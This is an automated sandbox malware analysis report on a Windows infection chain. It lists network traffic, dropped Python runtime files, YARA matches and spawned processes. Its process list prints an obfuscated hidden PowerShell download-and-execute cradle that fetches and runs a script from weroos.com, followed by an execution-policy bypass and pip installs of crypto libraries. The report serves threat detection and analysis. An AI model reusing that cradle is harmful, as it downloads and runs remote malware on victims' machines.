Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C64E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://opensource.org
Source: powershell.exe, 00000013.00000002.1686220805.000001CE37569000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1686220805.000001CE37D46000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://weroos.com
Source: powershell.exe, 00000013.00000002.1686220805.000001CE36941000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://weroos.com/SDkwjk.txt
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2B83C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://weroos.com/new.py
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C64E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.apache.org/licenses/
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C64E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cnri.reston.va.us)
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C64E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.cwi.nl)
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openssl.org/H
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2B83C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2B83C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/ftp/python/3.11.8/python-3.11.8-embed-amd64.zip
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2C64E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/psf/)

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49681 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49679 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.23.227.208:443 -> 192.168.2.16:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.189.173.4:443 -> 192.168.2.16:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.6.254:443 -> 192.168.2.16:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.138.254:443 -> 192.168.2.16:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.63.92:443 -> 192.168.2.16:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.64.223:443 -> 192.168.2.16:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.0.175:443 -> 192.168.2.16:49767 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 5504, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_msi.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_queue.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\unicodedata.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_multiprocessing.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_hashlib.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_ssl.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\python.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\python311.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_sqlite3.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_socket.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\winsound.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\select.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\sqlite3.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\libssl-3.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_ctypes.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_decimal.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_zoneinfo.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_asyncio.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_elementtree.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_uuid.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_lzma.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_overlapped.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\pythonw.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\vcruntime140_1.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\_bz2.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\pyexpat.pyd	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\libffi-8.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\libcrypto-3.dll	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Temp\PyEnv\python3.dll	Jump to dropped file

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FFF7F8E0F65	19_2_00007FFF7F8E0F65
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FFF7F8E1B90	19_2_00007FFF7F8E1B90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 19_2_00007FFF7F8E18A2	19_2_00007FFF7F8E18A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFF7F836132	20_2_00007FFF7F836132
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFF7F836420	20_2_00007FFF7F836420
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 20_2_00007FFF7F834065	20_2_00007FFF7F834065
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF80686A350	26_2_00007FF80686A350
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF806870994	26_2_00007FF806870994
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF80686E590	26_2_00007FF80686E590
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF80686B580	26_2_00007FF80686B580
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF806869920	26_2_00007FF806869920
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF806874EA8	26_2_00007FF806874EA8
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF80686B2B0	26_2_00007FF80686B2B0
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068742A4	26_2_00007FF8068742A4
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068746A4	26_2_00007FF8068746A4
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF80686D2A0	26_2_00007FF80686D2A0
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF806867E49	26_2_00007FF806867E49
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068A1060	26_2_00007FF8068A1060
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068C1BA0	26_2_00007FF8068C1BA0
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068C2FD0	26_2_00007FF8068C2FD0
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068C5360	26_2_00007FF8068C5360
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068C5C90	26_2_00007FF8068C5C90
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068CF8CC	26_2_00007FF8068CF8CC
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068C8CE0	26_2_00007FF8068C8CE0
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068C2520	26_2_00007FF8068C2520
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068C12B0	26_2_00007FF8068C12B0
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068C6E4C	26_2_00007FF8068C6E4C
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068F3E80	26_2_00007FF8068F3E80
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068FC798	26_2_00007FF8068FC798
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068F2EC0	26_2_00007FF8068F2EC0
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068F3BF0	26_2_00007FF8068F3BF0
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068F1000	26_2_00007FF8068F1000
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF8068F6070	26_2_00007FF8068F6070
Source: C:\Temp\PyEnv\python.exe	Code function: 26_2_00007FF806917CA0	26_2_00007FF806917CA0

PE file contains executable resources (Code or Archives)

Source: pythonw.exe.20.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.20.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: _overlapped.pyd.20.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

PE file does not import any functions

Source: python3.dll.20.dr

Static PE information: No import functions for PE file found

Yara signature match

Source: Process Memory Space: powershell.exe PID: 5504, type: MEMORYSTR

Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.phis.evad.win@39/1409@90/17

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google\Chrome\Application\Dictionaries

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Y4TFCR

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2128:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ngnzao2z.fzv.ps1

Jump to behavior

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2000,i,4887704872573849148,15116561827335116035,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2188 /prefetch:3
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://flexjjet.com"
Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Temp\PyEnv\python.exe "C:\Temp\PyEnv\python.exe" C:\\Temp\PyEnv\get-pip.py
Source: C:\Temp\PyEnv\python.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Temp\PyEnv\python.exe "C:\Temp\PyEnv\python.exe" -m pip install pycryptodome pypiwin32
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2000,i,4887704872573849148,15116561827335116035,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2188 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -W Hidden -c "$giv='h'+'ttp'+'s';$ad=':'+'//'+'weroos'+'.'+'com'+'/';$jl='SDk'+'wjk'+'.txt';$l=$giv+$ad+$jl;$sa='{0}{1}{2}' -f 'Net.','Web','Client';$c=New-Object ($sa);$v=$c.('Download'+'String')($l);$yd=[ScriptBlock]::Create($v);&$yd"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -W Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Y4TFCR\runme.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Temp\PyEnv\python.exe "C:\Temp\PyEnv\python.exe" C:\\Temp\PyEnv\get-pip.py	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Temp\PyEnv\python.exe "C:\Temp\PyEnv\python.exe" -m pip install pycryptodome pypiwin32	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
